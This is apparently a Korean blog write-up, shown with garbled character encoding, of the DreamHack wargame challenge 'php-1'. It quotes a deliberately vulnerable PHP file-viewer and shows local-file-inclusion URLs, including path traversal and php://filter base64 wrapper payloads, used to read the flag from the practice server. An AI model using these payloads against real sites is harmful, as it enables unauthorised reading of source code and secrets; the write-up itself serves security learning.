๐Ÿ”’ Cyber Security/Web Hacking (์›นํ•ดํ‚น)

[DreamHack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น php-1

์„ ๋‹ฌ 2023. 11. 2. 17:03
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/46

 

php-1

php๋กœ ์ž‘์„ฑ๋œ Back Office ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. LFI ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” /var/www/uploads/flag.php์— ์žˆ์Šต๋‹ˆ๋‹ค. Reference Server-side Basic

dreamhack.io

 

๋ฌธ์ œ์„ค๋ช…

php๋กœ ์ž‘์„ฑ๋œ Back Office ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค.

LFI ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” /var/www/uploads/flag.php์— ์žˆ์Šต๋‹ˆ๋‹ค.

 

<h2>View</h2>
<pre><?php
    $file = $_GET['file']?$_GET['file']:'';
    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);
?>
</pre>

 

ํŒŒ์ผ์ด ์—ฌ๋Ÿฌ๊ฐœ ์žˆ๊ธด ํ•˜์ง€๋งŒ..!

ํžŒํŠธ๊ฐ€ ๋˜๋Š” ์ฝ”๋“œ๋Š” view.php ์ด๋‹ค

 

ํ’€์ด

php๋กœ ๋งŒ๋“ค์–ด์ง„ ์‚ฌ์ดํŠธ๋Š” LFI ๋กœ ์ ‘๊ทผ ๊ฐ€๋Šฅํ•˜๋‹ค

 

https://opentutorials.org/module/4291/26819

 

LFI(2) - with php wrapper - WEB1

์ด๋ฒˆ ์‹œ๊ฐ„์—๋Š” php wrapper๋ฅผ ์‚ฌ์šฉํ•œ lfi์— ๋Œ€ํ•ด ์•Œ์•„๋ณด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค.  ์šฐ์„  wrapper๋ž€ ์‹ค์ œ ๋ฐ์ดํ„ฐ์˜ ์•ž์—์„œ ์–ด๋–ค ํ‹€์„ ์žก์•„ ์ฃผ๋Š” ๋ฐ์ดํ„ฐ ๋˜๋Š” ๋‹ค๋ฅธ ํ”„๋กœ๊ทธ๋žจ์ด ์„ฑ๊ณต์ ์œผ๋กœ ์‹คํ–‰๋˜๋„๋ก ์„ค์ •ํ•˜๋Š”

opentutorials.org

 

๊ฐ„๋‹จํžˆ ์š”์•ฝํ•˜๋ฉด php ๋กœ ๋งŒ๋“ค์–ด์ง„ ์‚ฌ์ดํŠธ๋Š”

{url}?page=view&file={๊ฒฝ๋กœ}

์˜ ํ˜•ํƒœ๋กœ ํ•ด๋‹น ๊ฒฝ๋กœ์— ์žˆ๋Š” ํŒŒ์ผ์„ ๋กœ๋“œํ•˜๊ฒŒ ๋œ๋‹ค

 

http://host3.dreamhack.games:20052/?page=view&file=../uploads/flag.php

 

๋‹ค๋งŒ ์ตœ์†Œํ•œ์˜ ๋ณด์•ˆ์žฅ์น˜๋Š” ๋˜์–ด์žˆ๋‹ค

    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);

 

preg_match ํŒจํ„ด์ด ์ผ์น˜ํ•˜๋Š”์ง€๋ฅผ ๋”ฐ์ง€๊ธฐ ๋•Œ๋ฌธ์— "flag" ๋ผ๋Š” ๋‹จ์–ด๊ฐ€ ํฌํ•จ๋˜๊ธฐ๋งŒ ํ•˜๋ฉด 

๋Œ€๋ฌธ์ž ์†Œ๋ฌธ์ž ์ƒ๊ด€์—†์ด (i๊ฐ€ ๊ทธ ์—ญํ• )

Permission denied ๊ฐ€ ๋œจ๋Š”๊ฒƒ..

 

์ด์ œ ์œ„์— ์–ธ๊ธ‰ํ•œ lfi ๋ฅผ ์ด์šฉํ•˜์ž

 

๊ฐ•์˜์— ๋‚˜์™€์žˆ๋Š”๋Œ€๋กœ

http://host3.dreamhack.games:23763/?page=php://filter/read=string.toupper/resource=/var/www/uploads/flag

๋ฅผ ์ž…๋ ฅํ•ด์„œ ์ ‘์†ํ–ˆ๋”๋‹ˆ

CAN YOU SEE $FLAG ๋งŒ ๋‚˜์˜จ๋‹ค

 

์ด๋ฒˆ์—” ์œ„ ๋งํฌ์— ๋‚˜์™€์žˆ๋Š”๋Œ€๋กœ

http://host3.dreamhack.games:23763/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag

๋ฅผ ์ž…๋ ฅํ•ด๋ณด์ž

 

base64๋กœ ์ธ์ฝ”๋”ฉ๋œ ์ฝ”๋“œ๊ฐ€ ๋‚˜์™”๋‹ค

 

https://www.base64decode.org/

 

Base64 Decode and Encode - Online

Decode from Base64 format or encode into it with various advanced options. Our site has an easy to use online tool to convert your data.

www.base64decode.org

 

ํ•ด์„ํ•ด๋ณด์ž

 

 

๋

๋ฐ˜์‘ํ˜•

'๐Ÿ”’ Cyber Security > Web Hacking (์›นํ•ดํ‚น)' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[DreamHack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : ex-reg-ex  (0) 2023.11.06
[Dreamhack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : Flying Chars  (2) 2023.11.03
[Dreamhack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : proxy-1  (1) 2023.10.16
[DreamHack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : session  (0) 2023.09.11
[DreamHack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : pathtraversal  (0) 2023.08.14

'๐Ÿ”’ Cyber Security/Web Hacking (์›นํ•ดํ‚น)'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€[DreamHack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น php-1

๊ด€๋ จ๊ธ€

๋Œ“๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”